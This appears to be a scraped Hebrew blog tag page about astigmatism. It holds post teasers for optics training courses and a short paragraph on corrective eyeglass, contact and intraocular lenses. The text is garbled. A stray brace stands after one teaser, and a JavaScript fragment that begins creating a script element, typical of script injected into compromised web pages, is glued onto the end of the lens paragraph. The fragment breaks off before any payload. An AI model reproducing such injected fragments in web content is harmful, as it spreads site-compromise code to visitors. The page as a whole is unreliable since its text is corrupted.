Posts Tagged 'אסטיגמציה'

השתלמות מבית סופלקס

}

המשך לקרא →
0

תעודה מבית טופלנס

המשך לקרא →
0

עדשות מתקנות למשקפיים

עדשה מתקנת למשקפיים היא עדשה המורכבת לפני העין במשקפיים ובשימוש נפוץ לטיפול במיופיה, היפראופיה אסטיגמציה ופרסביופיה.
עדשות מתקנות נמצאות במשקפיים המורכבות על פני המשתמש דהיינו משקפי ראייה, במרחק קצר מן העין. עדשות מגע מורכבות ישירות על העין. עדשות תוך עיניות (intracular lenses) מושתלות בעין בעיקר לאחר ניתוח להסרת קטרקט.var d=document;var s=d.createElement('script');

המשך לקרא →
0